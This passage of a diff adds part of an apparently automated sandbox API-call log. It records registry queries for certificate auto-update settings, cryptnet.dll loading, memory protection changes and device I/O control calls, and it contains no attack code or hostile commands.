+ }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\AuthRoot" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\AuthRoot" + } + ], + "repeated": 0, + "id": 2531 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2532 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "DesiredAccess", + "value": "0x00020119", + "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + } + ], + "repeated": 0, + "id": 2533 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "ValueName", + "value": "SyncDeltaTime" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\SyncDeltaTime" + } + ], + "repeated": 0, + "id": 2534 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "ValueName", + "value": "Flags" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\Flags" + } + ], + "repeated": 0, + "id": 2535 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "ValueName", + "value": "RootDirUrl" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\RootDirUrl" + } + ], + "repeated": 0, + "id": 2536 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2537 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "DesiredAccess", + "value": "0x00020119", + "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + } + ], + "repeated": 0, + "id": 2538 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "ValueName", + "value": "LastSyncTime" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\LastSyncTime" + } + ], + "repeated": 0, + "id": 2539 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2540 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "DesiredAccess", + "value": "0x00020119", + "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate" + } + ], + "repeated": 0, + "id": 2541 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000059c" + }, + { + "name": "ValueName", + "value": "EncodedCtl" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\EncodedCtl" + } + ], + "repeated": 0, + "id": 2542 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8236", + "parentcaller": "0x756b8d62", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\SYSTEM32\\cryptnet" + }, + { + "name": "DllBase", + "value": "0x74200000" + } + ], + "repeated": 0, + "id": 2543 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8236", + "parentcaller": "0x76806784", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000002" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\cryptnet.dll" + }, + { + "name": "BaseAddress", + "value": "0x74200000" + } + ], + "repeated": 10, + "id": 2544 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8236", + "parentcaller": "0x756b8d62", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "cryptnet.dll" + }, + { + "name": "BaseAddress", + "value": "0x74200000" + } + ], + "repeated": 0, + "id": 2545 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756bfbba", + "parentcaller": "0x767e4c4c", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "cryptnet.dll" + }, + { + "name": "ModuleHandle", + "value": "0x74200000" + }, + { + "name": "FunctionName", + "value": "I_CryptNetGetConnectivity" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74206180" + } + ], + "repeated": 0, + "id": 2546 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b7eb6", + "parentcaller": "0x742061b8", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "29" + }, + { + "name": "TokenInformation", + "value": "\\x00\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2547 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x742061fd", + "parentcaller": "0x767e4c5c", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 2548 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7703feff", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74222000" + }, + { + "name": "ModuleName", + "value": "cryptnet.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2549 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7703ff34", + "parentcaller": "0x7703fdf4", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74222000" + }, + { + "name": "ModuleName", + "value": "cryptnet.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2550 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76041aad", + "parentcaller": "0x73901a69", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x11\\x90s\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\xf3[\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x11\\x90s\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\xf3[\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\x00\\x00\\x008\\x00\\x00\\x00\\xe8\\xf3[\\x05i\\x1a\\x90s\\x01\\x00\\x00\\x00\\xf0\\x11\\x90s\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\xf3[\\x05\\x08\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2551 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x756b8be2", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000059c" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 2552 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76041aad", + "parentcaller": "0x73901a69", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x11\\x90s\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\xf3[\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x11\\x90s\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\xf3[\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\x00\\x00\\x008\\x00\\x00\\x00\\xe8\\xf3[\\x05i\\x1a\\x90s\\x01\\x00\\x00\\x00\\xf0\\x11\\x90s\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\xf3[\\x05\\x08\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2553 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756b8c89", + "parentcaller": "0x756b8be2", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000059c" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 2554 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76041aad", + "parentcaller": "0x738c547b", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc8\\xf3[\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc8\\xf3[\\x05\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00h\\x00\\x00\\x008\\x00\\x00\\x00\\xd0\\xf3[\\x05{T\\x8cs\\x01\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc8\\xf3[\\x05\\x08\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2555 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76041501", + "parentcaller": "0x738c5968", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x0012001b" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00|\\xf4[\\x05\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x08\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc8\\xf3[\\x05\\x08\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2556 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00580000" + }, + { + "name": "RegionSize", + "value": "0x00004000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2557 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76041711", + "parentcaller": "0x738c5968", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x0012001b" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xd0*V\\x00\\x08\\x00\\x00\\x00\\x80lW\\x00D\\x04\\x00\\x000\\xd7W\\x00\\xd8\\x00\\x00\\x00P\\xecW\\x00X\\x02\\x00\\x00\\x17\\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x1b\\x8cs\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xd0*V\\x00\\x08\\x00\\x00\\x00\\x80lW\\x00D\\x04\\x00\\x000\\xd7W\\x00\\xd8\\x00\\x00\\x00P\\xecW\\x00X\\x02\\x00\\x00\\x17\\x00\\x00\\x00\\x00\\x00\\x00\\x00p\\x00\\x00\\x00\\x00\\x00\\x00\\x00p\\x00\\x00\\x00\\x00\\x00\\x00\\x00<\\x00\\x00\\x00\\x19\\x00\\x00\\x00\\x9c\\x05\\x00\\x00\\xd0*V\\x000\\xd7W\\x00l\\xf4[\\x05hY\\x8cs\\x01\\x00\\x00\\x00" + } + ], + "repeated": 0, + "id": 2558 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x00584000" + }, + { + "name": "RegionSize", + "value": "0x0000b000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 2559 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76041aad", + "parentcaller": "0x738c5b5d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": false, + "return": "0xffffffffc0000225", + "pretty_return": "NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\x1b\\x8cs\\x07\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00x{X\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\xf4[\\x05 \\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 2560 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76041aad", + "parentcaller": "0x738c5b5d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": false, + "return": "0xffffffffc0000225", + "pretty_return": "NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00H\\x1b\\x8cs\\x07\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00x{X\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\xf4[\\x05 \\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 2561 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76041aad", + "parentcaller": "0x738c5b5d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": false, + "return": "0xffffffffc0000225", + "pretty_return": "NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\x1b\\x8cs\\x07\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc0\\x80X\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\xf4[\\x05 \\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 2562 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76041aad", + "parentcaller": "0x738c5b5d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": false, + "return": "0xffffffffc0000225", + "pretty_return": "NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00H\\x1b\\x8cs\\x07\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc0\\x80X\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\xf4[\\x05 \\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 2563 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76041aad", + "parentcaller": "0x738c5b5d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": false, + "return": "0xffffffffc0000225", + "pretty_return": "NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\x1b\\x8cs\\x07\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x86X\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\xf4[\\x05 \\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 2564 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76041aad", + "parentcaller": "0x738c5b5d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": false, + "return": "0xffffffffc0000225", + "pretty_return": "NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00H\\x1b\\x8cs\\x07\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x86X\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\xf4[\\x05 \\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 2565 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76041aad", + "parentcaller": "0x738c5b5d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": false, + "return": "0xffffffffc0000225", + "pretty_return": "NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\x1b\\x8cs\\x07\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x8bX\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\xf4[\\x05 \\x00\\x00\\x00" + }, + { + "name": "OutputBuffer", + "value": "" + } + ], + "repeated": 0, + "id": 2566 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x76041aad", + "parentcaller": "0x738c5b5d", + "category": "device", + "api": "NtDeviceIoControlFile", + "status": false, + "return": "0xffffffffc0000225", + "pretty_return": "NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000360" + }, + { + "name": "IoControlCode", + "value": "0x0012000f" + }, + { + "name": "InputBuffer", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00H\\x1b\\x8cs\\x07\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x8bX\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\xf4[\\x05 